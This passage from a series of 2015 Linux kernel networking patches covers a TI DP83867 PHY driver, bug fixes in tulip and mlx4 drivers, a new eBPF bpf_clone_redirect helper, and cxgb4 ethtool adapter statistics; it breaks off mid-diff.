phy_read(phydev, MII_DP83867_MICR); + if (micr_status < 0) + return micr_status; + + micr_status |= + (MII_DP83867_MICR_AN_ERR_INT_EN | + MII_DP83867_MICR_SPEED_CHNG_INT_EN | + MII_DP83867_MICR_DUP_MODE_CHNG_INT_EN | + MII_DP83867_MICR_SLEEP_MODE_CHNG_INT_EN); + + return phy_write(phydev, MII_DP83867_MICR, micr_status); + } + + micr_status = 0x0; + return phy_write(phydev, MII_DP83867_MICR, micr_status); +} + +#ifdef CONFIG_OF_MDIO +static int dp83867_of_init(struct phy_device *phydev) +{ + struct dp83867_private *dp83867 = phydev->priv; + struct device *dev = &phydev->dev; + struct device_node *of_node = dev->of_node; + int ret; + + if (!of_node && dev->parent->of_node) + of_node = dev->parent->of_node; + + if (!phydev->dev.of_node) + return -ENODEV; + + ret = of_property_read_u32(of_node, "ti,rx_int_delay", + &dp83867->rx_id_delay); + if (ret) + return ret; + + ret = of_property_read_u32(of_node, "ti,tx_int_delay", + &dp83867->tx_id_delay); + if (ret) + return ret; + + ret = of_property_read_u32(of_node, "ti,fifo_depth", + &dp83867->fifo_depth); + if (ret) + return ret; + + return 0; +} +#else +static int dp83867_of_init(struct phy_device *phydev) +{ + return 0; +} +#endif /* CONFIG_OF_MDIO */ + +static int dp83867_config_init(struct phy_device *phydev) +{ + struct dp83867_private *dp83867; + int ret; + u16 val, delay; + + if (!phydev->priv) { + dp83867 = devm_kzalloc(&phydev->dev, sizeof(*dp83867), + GFP_KERNEL); + if (!dp83867) + return -ENOMEM; + + phydev->priv = dp83867; + ret = dp83867_of_init(phydev); + if (ret) + return ret; + } else { + dp83867 = (struct dp83867_private *)phydev->priv; + } + + if (phy_interface_is_rgmii(phydev)) { + ret = phy_write(phydev, MII_DP83867_PHYCTRL, + (dp83867->fifo_depth << DP83867_PHYCR_FIFO_DEPTH_SHIFT)); + if (ret) + return ret; + } + + if 
((phydev->interface >= PHY_INTERFACE_MODE_RGMII_ID) || + (phydev->interface <= PHY_INTERFACE_MODE_RGMII_RXID)) { + val = phy_read_mmd_indirect(phydev, DP83867_RGMIICTL, + DP83867_DEVADDR, phydev->addr); + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) + val |= (DP83867_RGMII_TX_CLK_DELAY_EN | DP83867_RGMII_RX_CLK_DELAY_EN); + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID) + val |= DP83867_RGMII_TX_CLK_DELAY_EN; + + if (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) + val |= DP83867_RGMII_RX_CLK_DELAY_EN; + + phy_write_mmd_indirect(phydev, DP83867_RGMIICTL, + DP83867_DEVADDR, phydev->addr, val); + + delay = (dp83867->rx_id_delay | + (dp83867->tx_id_delay << DP83867_RGMII_TX_CLK_DELAY_SHIFT)); + + phy_write_mmd_indirect(phydev, DP83867_RGMIIDCTL, + DP83867_DEVADDR, phydev->addr, delay); + } + + return 0; +} + +static int dp83867_phy_reset(struct phy_device *phydev) +{ + int err; + + err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESET); + if (err < 0) + return err; + + return dp83867_config_init(phydev); +} + +static struct phy_driver dp83867_driver[] = { + { + .phy_id = DP83867_PHY_ID, + .phy_id_mask = 0xfffffff0, + .name = "TI DP83867", + .features = PHY_GBIT_FEATURES, + .flags = PHY_HAS_INTERRUPT, + + .config_init = dp83867_config_init, + .soft_reset = dp83867_phy_reset, + + /* IRQ related */ + .ack_interrupt = dp83867_ack_interrupt, + .config_intr = dp83867_config_intr, + + .config_aneg = genphy_config_aneg, + .read_status = genphy_read_status, + .suspend = genphy_suspend, + .resume = genphy_resume, + + .driver = {.owner = THIS_MODULE,} + }, +}; +module_phy_driver(dp83867_driver); + +static struct mdio_device_id __maybe_unused dp83867_tbl[] = { + { DP83867_PHY_ID, 0xfffffff0 }, + { } +}; + +MODULE_DEVICE_TABLE(mdio, dp83867_tbl); + +MODULE_DESCRIPTION("Texas Instruments DP83867 PHY driver"); +MODULE_AUTHOR("Dan Murphy + * + * Copyright: (C) 2015 Texas Instruments, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
+ */ + +#ifndef _DT_BINDINGS_TI_DP83867_H +#define _DT_BINDINGS_TI_DP83867_H + +/* PHY CTRL bits */ +#define DP83867_PHYCR_FIFO_DEPTH_3_B_NIB 0x00 +#define DP83867_PHYCR_FIFO_DEPTH_4_B_NIB 0x01 +#define DP83867_PHYCR_FIFO_DEPTH_6_B_NIB 0x02 +#define DP83867_PHYCR_FIFO_DEPTH_8_B_NIB 0x03 + +/* RGMIIDCTL internal delay for rx and tx */ +#define DP83867_RGMIIDCTL_250_PS 0x0 +#define DP83867_RGMIIDCTL_500_PS 0x1 +#define DP83867_RGMIIDCTL_750_PS 0x2 +#define DP83867_RGMIIDCTL_1_NS 0x3 +#define DP83867_RGMIIDCTL_1_25_NS 0x4 +#define DP83867_RGMIIDCTL_1_50_NS 0x5 +#define DP83867_RGMIIDCTL_1_75_NS 0x6 +#define DP83867_RGMIIDCTL_2_00_NS 0x7 +#define DP83867_RGMIIDCTL_2_25_NS 0x8 +#define DP83867_RGMIIDCTL_2_50_NS 0x9 +#define DP83867_RGMIIDCTL_2_75_NS 0xa +#define DP83867_RGMIIDCTL_3_00_NS 0xb +#define DP83867_RGMIIDCTL_3_25_NS 0xc +#define DP83867_RGMIIDCTL_3_50_NS 0xd +#define DP83867_RGMIIDCTL_3_75_NS 0xe +#define DP83867_RGMIIDCTL_4_00_NS 0xf + +#endif From e1395a321eab1a7833d82e952eb8255e0a1f03cb Mon Sep 17 00:00:00 2001 From: David Malcolm Date: Tue, 2 Jun 2015 15:31:17 -0400 Subject: [PATCH 670/872] drivers/net/ethernet/dec/tulip/uli526x.c: fix misleading indentation in uli526x_timer MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This code in drivers/net/ethernet/dec/tulip/uli526x.c function "uli526x_timer": 1086 } else 1087 if ((tmp_cr12 & 0x3) && db->link_failed) { [...snip...] 1109 } 1110 else if(!(tmp_cr12 & 0x3) && db->link_failed) 1111 { [...snip...] 1117 } 1118 db->init=0; is misleadingly indented: the db->init=0 is indented as if part of the else clause at line 1086, but it is independent of it (no braces before the "if" at line 1087). This patch fixes the indentation to reflect the actual meaning of the code, though is it actually meant to be part of the "else" clause? (I'm a compiler developer, not a kernel person). It also adds spaces around the assignment, to placate checkpatch.pl. Seen via an experimental new gcc warning I'm working on for gcc 6, -Wmisleading-indentation, using gcc r223098 adding -Werror=misleading-indentation to KBUILD_CFLAGS in Makefile. The experimental GCC emits this warning (as an error), rightly IMHO: drivers/net/ethernet/dec/tulip/uli526x.c: In function ‘uli526x_timer’: drivers/net/ethernet/dec/tulip/uli526x.c:1118:3: error: statement is indented as if it were guarded by... [-Werror=misleading-indentation] db->init=0; ^ drivers/net/ethernet/dec/tulip/uli526x.c:1086:4: note: ...this ‘else’ clause, but it is not } else ^ Hope this is helpful Dave Signed-off-by: David Malcolm Signed-off-by: David S. Miller --- drivers/net/ethernet/dec/tulip/uli526x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/dec/tulip/uli526x.c b/drivers/net/ethernet/dec/tulip/uli526x.c index 2c30c0c83f98..447d09272ab7 100644 --- a/drivers/net/ethernet/dec/tulip/uli526x.c +++ b/drivers/net/ethernet/dec/tulip/uli526x.c @@ -1115,7 +1115,7 @@ static void uli526x_timer(unsigned long data) netif_carrier_off(dev); } } - db->init=0; + db->init = 0; /* Timer active again */ db->timer.expires = ULI526X_TIMER_WUT; From 5114a04e6c73a0c6e74737e801b8a3b3d40c7e36 Mon Sep 17 00:00:00 2001 From: Carol L Soto Date: Tue, 2 Jun 2015 16:07:23 -0500 Subject: [PATCH 671/872] net/mlx4_core: double free of dev_vfs If user loads mlx4_core with num_vfs greater than supported then variable dev->dev_vfs is freed 2 times after unloading the driver. Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. 
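The one-line fix below relies on a standard kernel idiom: after kfree(), clear the pointer so that any later teardown path that frees it again hits kfree(NULL), which is defined to be a no-op. A sketch of the pattern (the structure and function names here are made up for illustration, they are not mlx4 code):

  /* Sketch of the "free and NULL" idiom; not actual mlx4 code. */
  #include <linux/slab.h>

  struct demo_dev {
          void *dev_vfs;
  };

  static void demo_release_vfs(struct demo_dev *dev)
  {
          kfree(dev->dev_vfs);
          dev->dev_vfs = NULL;    /* a second release along another path is now harmless */
  }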
Miller --- drivers/net/ethernet/mellanox/mlx4/main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 0dbd70427221..9485cbef5166 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2824,6 +2824,7 @@ static u64 mlx4_enable_sriov(struct mlx4_dev *dev, struct pci_dev *pdev, free_mem: dev->persist->num_vfs = 0; kfree(dev->dev_vfs); + dev->dev_vfs = NULL; return dev_flags & ~MLX4_FLAG_MASTER; } From ed3d2276ef72be23c6367358d80004130d8c797d Mon Sep 17 00:00:00 2001 From: Carol Soto Date: Tue, 2 Jun 2015 16:07:24 -0500 Subject: [PATCH 672/872] net/mlx4_core: need to call close fw if alloc icm is called twice If mlx4_enable_sriov is called by adapter without this feature MLX4_DEV_CAP_FLAG2_SYS_EQS then during this path the function alloc icm is called twice without freeing the structures from the first time. Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 9485cbef5166..7d57777e65c5 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2976,6 +2976,7 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, existing_vfs, reset_flow); + mlx4_close_fw(dev); mlx4_cmd_cleanup(dev, MLX4_CMD_CLEANUP_ALL); dev->flags = dev_flags; if (!SRIOV_VALID_STATE(dev->flags)) { From 613d8c188ffc6f24b7a64dbce74a1b78017c0238 Mon Sep 17 00:00:00 2001 From: Carol Soto Date: Tue, 2 Jun 2015 16:07:25 -0500 Subject: [PATCH 673/872] net/mlx4_core: fix typo in mlx4_set_vf_mac fix typo in mlx4_set_vf_mac Acked-by: Or Gerlitz Signed-off-by: Carol L Soto Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/cmd.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/cmd.c b/drivers/net/ethernet/mellanox/mlx4/cmd.c index 91d834495fb7..68ae765873a9 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx4/cmd.c @@ -2917,7 +2917,7 @@ int mlx4_set_vf_mac(struct mlx4_dev *dev, int port, int vf, u64 mac) port = mlx4_slaves_closest_port(dev, slave, port); s_info = &priv->mfunc.master.vf_admin[slave].vport[port]; s_info->mac = mac; - mlx4_info(dev, "default mac on vf %d port %d to %llX will take afect only after vf restart\n", + mlx4_info(dev, "default mac on vf %d port %d to %llX will take effect only after vf restart\n", vf, port, s_info->mac); return 0; } From 3896d655f4d491c67d669a15f275a39f713410f8 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Tue, 2 Jun 2015 16:03:14 -0700 Subject: [PATCH 674/872] bpf: introduce bpf_clone_redirect() helper Allow eBPF programs attached to classifier/actions to call bpf_clone_redirect(skb, ifindex, flags) helper which will mirror or redirect the packet by dynamic ifindex selection from within the program to a target device either at ingress or at egress. Can be used for various scenarios, for example, to load balance skbs into veths, split parts of the traffic to local taps, etc. Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. 
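To make the intended use of the new helper concrete, here is a rough sketch of a cls_bpf program in the style of the kernel's samples/bpf directory (the helper declaration, section name, ifindex and return value are illustrative assumptions; only the helper id BPF_FUNC_clone_redirect and the flags semantics come from this patch):

  /* Sketch only: clone every packet seen by the classifier to the egress
   * path of ifindex 2. Intended for clang -target bpf, samples/bpf style. */
  #include <uapi/linux/bpf.h>

  static int (*bpf_clone_redirect)(void *skb, int ifindex, int flags) =
          (void *) BPF_FUNC_clone_redirect;

  __attribute__((section("classifier"), used))
  int cls_mirror(struct __sk_buff *skb)
  {
          /* bit 0 of flags clear: redirect to egress; set it for ingress */
          bpf_clone_redirect(skb, 2, 0);
          return 0;       /* illustrative: let normal classification continue */
  }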
Miller --- include/uapi/linux/bpf.h | 10 ++++++++++ net/core/filter.c | 40 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+) diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index 72f3080afa1e..42aa19abab86 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -220,6 +220,16 @@ enum bpf_func_id { * Return: 0 on success */ BPF_FUNC_tail_call, + + /** + * bpf_clone_redirect(skb, ifindex, flags) - redirect to another netdev + * @skb: pointer to skb + * @ifindex: ifindex of the net device + * @flags: bit 0 - if set, redirect to ingress instead of egress + * other bits - reserved + * Return: 0 on success + */ + BPF_FUNC_clone_redirect, __BPF_FUNC_MAX_ID, }; diff --git a/net/core/filter.c b/net/core/filter.c index b78a010a957f..64c121c09655 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,6 +46,7 @@ #include #include #include +#include /** * sk_filter - run a packet through a socket filter @@ -1407,6 +1408,43 @@ const struct bpf_func_proto bpf_l4_csum_replace_proto = { .arg5_type = ARG_ANYTHING, }; +#define BPF_IS_REDIRECT_INGRESS(flags) ((flags) & 1) + +static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) +{ + struct sk_buff *skb = (struct sk_buff *) (long) r1, *skb2; + struct net_device *dev; + + dev = dev_get_by_index_rcu(dev_net(skb->dev), ifindex); + if (unlikely(!dev)) + return -EINVAL; + + if (unlikely(!(dev->flags & IFF_UP))) + return -EINVAL; + + skb2 = skb_clone(skb, GFP_ATOMIC); + if (unlikely(!skb2)) + return -ENOMEM; + + if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) + skb_push(skb2, skb2->mac_len); + + if (BPF_IS_REDIRECT_INGRESS(flags)) + return dev_forward_skb(dev, skb2); + + skb2->dev = dev; + return dev_queue_xmit(skb2); +} + +const struct bpf_func_proto bpf_clone_redirect_proto = { + .func = bpf_clone_redirect, + .gpl_only = false, + .ret_type = RET_INTEGER, + .arg1_type = ARG_PTR_TO_CTX, + .arg2_type = ARG_ANYTHING, + .arg3_type = ARG_ANYTHING, +}; + static const struct bpf_func_proto * sk_filter_func_proto(enum bpf_func_id func_id) { @@ -1440,6 +1478,8 @@ tc_cls_act_func_proto(enum bpf_func_id func_id) return &bpf_l3_csum_replace_proto; case BPF_FUNC_l4_csum_replace: return &bpf_l4_csum_replace_proto; + case BPF_FUNC_clone_redirect: + return &bpf_clone_redirect_proto; default: return sk_filter_func_proto(func_id); } From 3349b0b79e38f740fb794d3989d8bb3dd107fda0 Mon Sep 17 00:00:00 2001 From: Rasmus Villemoes Date: Wed, 3 Jun 2015 13:44:03 +0200 Subject: [PATCH 675/872] net: tulip: rearrange order of searching for substrings Currently, two of the branches are dead code, since an earlier smaller substring would have been found ("TP" in the "TP_NW" case and either of "BNC" and "AUI" in the "BNC_AUI" case). Rearrange the strstr() calls so that the longer strings are searched for first. Signed-off-by: Rasmus Villemoes Signed-off-by: David S. 
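The dead-code issue described above is easy to demonstrate: strstr() only tests for containment, so checking the short token first means the longer, more specific token can never be reached. A stand-alone illustration of why the reordering in the diff below matters:

  /* Sketch: "TP" is a substring of "TP_NW", so the longer token must be
   * tested first, as the reordered strstr() calls below do. */
  #include <stdio.h>
  #include <string.h>

  static const char *classify(const char *p)
  {
          if (strstr(p, "TP_NW"))         /* longer token first */
                  return "TP_NW";
          if (strstr(p, "TP"))
                  return "TP";
          return "other";
  }

  int main(void)
  {
          printf("%s\n", classify("autosense=TP_NW"));    /* TP_NW */
          printf("%s\n", classify("autosense=TP"));       /* TP */
          return 0;
  }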
Miller --- drivers/net/ethernet/dec/tulip/de4x5.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/dec/tulip/de4x5.c b/drivers/net/ethernet/dec/tulip/de4x5.c index badff181e719..8966f3159bb2 100644 --- a/drivers/net/ethernet/dec/tulip/de4x5.c +++ b/drivers/net/ethernet/dec/tulip/de4x5.c @@ -5189,16 +5189,16 @@ de4x5_parse_params(struct net_device *dev) if (strstr(p, "fdx") || strstr(p, "FDX")) lp->params.fdx = true; if (strstr(p, "autosense") || strstr(p, "AUTOSENSE")) { - if (strstr(p, "TP")) { - lp->params.autosense = TP; - } else if (strstr(p, "TP_NW")) { + if (strstr(p, "TP_NW")) { lp->params.autosense = TP_NW; + } else if (strstr(p, "TP")) { + lp->params.autosense = TP; + } else if (strstr(p, "BNC_AUI")) { + lp->params.autosense = BNC; } else if (strstr(p, "BNC")) { lp->params.autosense = BNC; } else if (strstr(p, "AUI")) { lp->params.autosense = AUI; - } else if (strstr(p, "BNC_AUI")) { - lp->params.autosense = BNC; } else if (strstr(p, "10Mb")) { lp->params.autosense = _10Mb; } else if (strstr(p, "100Mb")) { From a4cfd929c90afaf26be6aea1989feed068844c68 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:39 +0530 Subject: [PATCH 676/872] cxgb4: Add ethtool support to get adapter stats Add ethtool support to get adapter specific hardware statistics Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/infiniband/hw/cxgb4/provider.c | 8 +- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 58 ++++++-- .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 129 +++++++++++++++--- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 10 +- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 119 ++++++++++++++-- drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 10 ++ 6 files changed, 284 insertions(+), 50 deletions(-) diff --git a/drivers/infiniband/hw/cxgb4/provider.c b/drivers/infiniband/hw/cxgb4/provider.c index 66bd6a2ad83b..d95a0c300b03 100644 --- a/drivers/infiniband/hw/cxgb4/provider.c +++ b/drivers/infiniband/hw/cxgb4/provider.c @@ -445,10 +445,10 @@ static int c4iw_get_mib(struct ib_device *ibdev, cxgb4_get_tcp_stats(c4iw_dev->rdev.lldi.pdev, &v4, &v6); memset(stats, 0, sizeof *stats); - stats->iw.tcpInSegs = v4.tcpInSegs + v6.tcpInSegs; - stats->iw.tcpOutSegs = v4.tcpOutSegs + v6.tcpOutSegs; - stats->iw.tcpRetransSegs = v4.tcpRetransSegs + v6.tcpRetransSegs; - stats->iw.tcpOutRsts = v4.tcpOutRsts + v6.tcpOutSegs; + stats->iw.tcpInSegs = v4.tcp_in_segs + v6.tcp_in_segs; + stats->iw.tcpOutSegs = v4.tcp_out_segs + v6.tcp_out_segs; + stats->iw.tcpRetransSegs = v4.tcp_retrans_segs + v6.tcp_retrans_segs; + stats->iw.tcpOutRsts = v4.tcp_out_rsts + v6.tcp_out_rsts; return 0; } diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 4d3a8c20eb12..2d9bc621cc97 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -198,23 +198,34 @@ struct lb_port_stats { }; struct tp_tcp_stats { - u32 tcpOutRsts; - u64 tcpInSegs; - u64 tcpOutSegs; - u64 tcpRetransSegs; + u32 tcp_out_rsts; + u64 tcp_in_segs; + u64 tcp_out_segs; + u64 tcp_retrans_segs; +}; + +struct tp_usm_stats { + u32 frames; + u32 drops; + u64 octets; }; struct tp_err_stats { - u32 macInErrs[4]; - u32 hdrInErrs[4]; - u32 tcpInErrs[4]; - u32 tnlCongDrops[4]; - u32 ofldChanDrops[4]; - u32 tnlTxDrops[4]; - u32 ofldVlanDrops[4]; - u32 tcp6InErrs[4]; - u32 ofldNoNeigh; - u32 ofldCongDefer; + u32 mac_in_errs[4]; + u32 hdr_in_errs[4]; + u32 tcp_in_errs[4]; + u32 tnl_cong_drops[4]; 
+ u32 ofld_chan_drops[4]; + u32 tnl_tx_drops[4]; + u32 ofld_vlan_drops[4]; + u32 tcp6_in_errs[4]; + u32 ofld_no_neigh; + u32 ofld_cong_defer; +}; + +struct tp_rdma_stats { + u32 rqe_dfr_pkt; + u32 rqe_dfr_mod; }; struct sge_params { @@ -446,6 +457,7 @@ struct port_info { u8 rss_mode; struct link_config link_cfg; u16 *rss; + struct port_stats stats_base; #ifdef CONFIG_CHELSIO_T4_DCB struct port_dcb_info dcb; /* Data Center Bridging support */ #endif @@ -686,6 +698,12 @@ struct l2t_data; #endif +struct doorbell_stats { + u32 db_drop; + u32 db_empty; + u32 db_full; +}; + struct adapter { void __iomem *regs; void __iomem *bar2; @@ -710,6 +728,7 @@ struct adapter { char desc[IFNAMSIZ + 10]; } msix_info[MAX_INGQ + 1]; + struct doorbell_stats db_stats; struct sge sge; struct net_device *port[MAX_NPORTS]; @@ -864,6 +883,11 @@ enum { VLAN_REWRITE }; +static inline int is_offload(const struct adapter *adap) +{ + return adap->params.offload; +} + static inline int is_t6(enum chip_type chip) { return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T6; @@ -1287,11 +1311,17 @@ int t4_cim_read_la(struct adapter *adap, u32 *la_buf, unsigned int *wrptr); void t4_read_cimq_cfg(struct adapter *adap, u16 *base, u16 *size, u16 *thres); const char *t4_get_port_type_description(enum fw_port_type port_type); void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p); +void t4_get_port_stats_offset(struct adapter *adap, int idx, + struct port_stats *stats, + struct port_stats *offset); void t4_read_mtu_tbl(struct adapter *adap, u16 *mtus, u8 *mtu_log); void t4_read_cong_tbl(struct adapter *adap, u16 incr[NMTUS][NCCTRL_WIN]); void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, unsigned int mask, unsigned int val); void t4_tp_read_la(struct adapter *adap, u64 *la_buf, unsigned int *wrptr); +void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st); +void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st); +void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st); void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, struct tp_tcp_stats *v6); void t4_load_mtus(struct adapter *adap, const unsigned short *mtus, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 13d5101a0d9f..63b1ae608d1f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -108,15 +108,37 @@ static const char stats_strings[][ETH_GSTRING_LEN] = { "VLANinsertions ", "GROpackets ", "GROmerged ", - "WriteCoalSuccess ", - "WriteCoalFail ", +}; + +static char adapter_stats_strings[][ETH_GSTRING_LEN] = { + "db_drop ", + "db_full ", + "db_empty ", + "tcp_ipv4_out_rsts ", + "tcp_ipv4_in_segs ", + "tcp_ipv4_out_segs ", + "tcp_ipv4_retrans_segs ", + "tcp_ipv6_out_rsts ", + "tcp_ipv6_in_segs ", + "tcp_ipv6_out_segs ", + "tcp_ipv6_retrans_segs ", + "usm_ddp_frames ", + "usm_ddp_octets ", + "usm_ddp_drops ", + "rdma_no_rqe_mod_defer ", + "rdma_no_rqe_pkt_defer ", + "tp_err_ofld_no_neigh ", + "tp_err_ofld_cong_defer ", + "write_coal_success ", + "write_coal_fail ", }; static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: - return ARRAY_SIZE(stats_strings); + return ARRAY_SIZE(stats_strings) + + ARRAY_SIZE(adapter_stats_strings); default: return -EOPNOTSUPP; } @@ -168,8 +190,12 @@ static void get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) static void get_strings(struct net_device 
*dev, u32 stringset, u8 *data) { - if (stringset == ETH_SS_STATS) + if (stringset == ETH_SS_STATS) { memcpy(data, stats_strings, sizeof(stats_strings)); + data += sizeof(stats_strings); + memcpy(data, adapter_stats_strings, + sizeof(adapter_stats_strings)); + } } /* port stats maintained per queue of the port. They should be in the same @@ -185,6 +211,29 @@ struct queue_port_stats { u64 gro_merged; }; +struct adapter_stats { + u64 db_drop; + u64 db_full; + u64 db_empty; + u64 tcp_v4_out_rsts; + u64 tcp_v4_in_segs; + u64 tcp_v4_out_segs; + u64 tcp_v4_retrans_segs; + u64 tcp_v6_out_rsts; + u64 tcp_v6_in_segs; + u64 tcp_v6_out_segs; + u64 tcp_v6_retrans_segs; + u64 frames; + u64 octets; + u64 drops; + u64 rqe_dfr_mod; + u64 rqe_dfr_pkt; + u64 ofld_no_neigh; + u64 ofld_cong_defer; + u64 wc_success; + u64 wc_fail; +}; + static void collect_sge_port_stats(const struct adapter *adap, const struct port_info *p, struct queue_port_stats *s) @@ -205,30 +254,74 @@ static void collect_sge_port_stats(const struct adapter *adap, } } +static void collect_adapter_stats(struct adapter *adap, struct adapter_stats *s) +{ + struct tp_tcp_stats v4, v6; + struct tp_rdma_stats rdma_stats; + struct tp_err_stats err_stats; + struct tp_usm_stats usm_stats; + u64 val1, val2; + + memset(s, 0, sizeof(*s)); + + spin_lock(&adap->stats_lock); + t4_tp_get_tcp_stats(adap, &v4, &v6); + t4_tp_get_rdma_stats(adap, &rdma_stats); + t4_get_usm_stats(adap, &usm_stats); + t4_tp_get_err_stats(adap, &err_stats); + spin_unlock(&adap->stats_lock); + + s->db_drop = adap->db_stats.db_drop; + s->db_full = adap->db_stats.db_full; + s->db_empty = adap->db_stats.db_empty; + + s->tcp_v4_out_rsts = v4.tcp_out_rsts; + s->tcp_v4_in_segs = v4.tcp_in_segs; + s->tcp_v4_out_segs = v4.tcp_out_segs; + s->tcp_v4_retrans_segs = v4.tcp_retrans_segs; + s->tcp_v6_out_rsts = v6.tcp_out_rsts; + s->tcp_v6_in_segs = v6.tcp_in_segs; + s->tcp_v6_out_segs = v6.tcp_out_segs; + s->tcp_v6_retrans_segs = v6.tcp_retrans_segs; + + if (is_offload(adap)) { + s->frames = usm_stats.frames; + s->octets = usm_stats.octets; + s->drops = usm_stats.drops; + s->rqe_dfr_mod = rdma_stats.rqe_dfr_mod; + s->rqe_dfr_pkt = rdma_stats.rqe_dfr_pkt; + } + + s->ofld_no_neigh = err_stats.ofld_no_neigh; + s->ofld_cong_defer = err_stats.ofld_cong_defer; + + if (!is_t4(adap->params.chip)) { + int v; + + v = t4_read_reg(adap, SGE_STAT_CFG_A); + if (STATSOURCE_T5_G(v) == 7) { + val2 = t4_read_reg(adap, SGE_STAT_MATCH_A); + val1 = t4_read_reg(adap, SGE_STAT_TOTAL_A); + s->wc_success = val1 - val2; + s->wc_fail = val2; + } + } +} + static void get_stats(struct net_device *dev, struct ethtool_stats *stats, u64 *data) { struct port_info *pi = netdev_priv(dev); struct adapter *adapter = pi->adapter; - u32 val1, val2; - t4_get_port_stats(adapter, pi->tx_chan, (struct port_stats *)data); + t4_get_port_stats_offset(adapter, pi->tx_chan, + (struct port_stats *)data, + &pi->stats_base); data += sizeof(struct port_stats) / sizeof(u64); collect_sge_port_stats(adapter, pi, (struct queue_port_stats *)data); data += sizeof(struct queue_port_stats) / sizeof(u64); - if (!is_t4(adapter->params.chip)) { - t4_write_reg(adapter, SGE_STAT_CFG_A, STATSOURCE_T5_V(7)); - val1 = t4_read_reg(adapter, SGE_STAT_TOTAL_A); - val2 = t4_read_reg(adapter, SGE_STAT_MATCH_A); - *data = val1 - val2; - data++; - *data = val2; - data++; - } else { - memset(data, 0, 2 * sizeof(u64)); - *data += 2; - } + collect_adapter_stats(adapter, (struct adapter_stats *)data); } static void get_regs(struct net_device *dev, struct ethtool_regs 
*regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index a589591e5b63..305715484004 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -1353,11 +1353,6 @@ static u16 cxgb_select_queue(struct net_device *dev, struct sk_buff *skb, return fallback(dev, skb) % dev->real_num_tx_queues; } -static inline int is_offload(const struct adapter *adap) -{ - return adap->params.offload; -} - static int closest_timer(const struct sge *s, int time) { int i, delta, match = 0, min_delta = INT_MAX; @@ -2889,7 +2884,8 @@ static struct rtnl_link_stats64 *cxgb_get_stats(struct net_device *dev, spin_unlock(&adapter->stats_lock); return ns; } - t4_get_port_stats(adapter, p->tx_chan, &stats); + t4_get_port_stats_offset(adapter, p->tx_chan, &stats, + &p->stats_base); spin_unlock(&adapter->stats_lock); ns->tx_bytes = stats.tx_octets; @@ -4680,6 +4676,8 @@ static int init_one(struct pci_dev *pdev, const 